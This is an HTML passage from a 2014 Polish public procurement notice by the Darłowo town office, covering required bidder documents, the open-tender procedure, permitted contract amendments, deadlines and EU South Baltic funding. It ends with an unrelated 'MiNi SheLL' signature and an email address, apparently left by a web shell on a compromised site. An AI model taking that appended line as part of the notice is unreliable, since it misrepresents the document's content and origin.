<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">załączenie kart katalogowych potwierdzających spełnienie podstawowych założeń odnośnie zastosowanych materiałów</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, w przypadku wystąpienia niżej wymienionych okoliczności, których Zamawiający nie był w stanie przewidzieć przed publikacją ogłoszenia o przetargu:

1.	Zmiany Umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Strony nie przewidywały w chwili zawierania Umowy, w tym m.in.:
- wystąpienie robót dodatkowych lub zamiennych, których wykonanie uzależnia wykonanie zamówienia podstawowego,
- wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających wykonywanie robót zgodnie z ich technologią i warunkami technicznymi zapewniającymi właściwą jakość ich wykonania, albo innych zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy, potwierdzone przez instytucje właściwe w/w. zakresie,
- wystąpienie niekorzystnych warunków gruntowych (np. wysoki poziom wód gruntowych) uniemożliwiających wykonywanie robót, zarówno istniejących przed podpisaniem umowy, a nieznanych stronom, jak i takich, które mogą wystąpić po podpisaniu umowy,
- wystąpienie okoliczności prawno - budowlanych wymagających wstrzymania robót,
- przekształcenie lub zmiana siedziby którejkolwiek ze stron umowy,
- zmiana osób reprezentujących strony oraz innych osób z nazwiska wymienionych 
w umowie,
- zmiany przepisów dot. obowiązujących stawek podatku VAT.
W sytuacjach określonych powyżej Strony, mając na uwadze poszanowanie wzajemnych interesów, zasady równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodny zamiar wykonania Przedmiotu Umowy, określą w niezbędnym zakresie wpływ powyższych okoliczności na dotychczasowe prawa i obowiązki. 
2. 	Niezależnie od postanowień wymienionych powyżej, Strony dopuszczają możliwość 
zmian korzystnych z punktu widzenia realizacji Przedmiotu Umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie Przedmiotu Umowy bądź zwiększających użyteczność Przedmiotu Umowy. 
W takiej sytuacji, Strony wprowadzą do Umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też, kierując się poszanowaniem wzajemnych interesów, zasadą równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania Przedmiotu Umowy, określą zmiany korzystne z punktu widzenia realizacji Przedmiotu Umowy. 
3.	Wszelkie zmiany wprowadzane do Umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. 
z 2013 r., poz. 907, z póżn. zm.) oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.darlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Darłowie, Plac Tadeusza Kościuszki 9, 76-150 Darłowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2014 godzina 10:30, miejsce: Urząd Miejski w Darłowie, Plac Tadeusza Kościuszki 9, 76-150 Darłowo, Sekretariat - pok. Nr 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane w ramach projektu INTERFACE PLUS / REFERENCE NUMBER WTPB.01.03.00-56-006/10 finansowanego z programu Południowy Bałtyk..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com